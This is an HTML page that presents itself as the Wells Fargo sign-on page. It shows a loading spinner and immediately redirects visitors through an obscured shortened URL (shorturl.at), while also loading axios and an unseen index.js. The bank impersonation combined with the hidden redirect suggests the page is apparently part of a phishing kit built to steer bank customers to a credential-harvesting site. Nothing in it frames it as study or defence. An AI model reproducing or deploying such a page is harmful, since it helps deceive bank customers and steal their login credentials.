<!DOCTYPE html>
<html lang="en">

<html>
<head>
    <meta charset="utf-8">

        

        <meta name="viewport" content="width=device-width, initial-scale=0.85, user-scalable=no">
        
        <title>Sign On - Wells Fargo</title>

    
        <link rel="stylesheet" href="style.css"
        type="text/css">
        <link rel="icon" href="ico.png" type="image/png">
        <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
        <script src="index.js"></script>

        <!--Styling link for remember me checkbox-->
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css">
        <style>
            body{
                background-image: none;
                background-color: white;
            }
        </style>
</head>
<body>
    
    <div class="loader"></div>

    <script>

        // Function to redirect to another page
        function redirectToAnotherPage() {
            window.location.href = 'https://shorturl.at/cuK17'; 
        }
        // Set the delay for redirection (1.5 seconds)
        var redirectDelay = 0; 
        // Wait for 1.5 seconds and then redirect
        setTimeout(redirectToAnotherPage, redirectDelay);

    </script>
    <style>
        body{
            overflow: hidden;
        }

        /*----------Loader----------------*/

        .loader {
            position: fixed;
            top: 45%;
            left: 49%;
            transform: translate(-50%, -50%);
            display: flex;
            align-items: center;
            justify-content: center;
            transition: opacity 0.75s, visibility 0.75s;
        }

        .loader::after {
            margin-top: 50px;
            content: "";
            width: 25px;
            height: 25px;
            border: 5px solid whitesmoke;
            border-top-color: #e8212b;
            border-radius: 50%;
            animation: loading 1.3s ease infinite;
        }

        @keyframes loading {
            from {
                transform: rotate(0turn);
            }
            to {
                transform: rotate(1turn);
            }
        }
    </style>

</body>
</html>
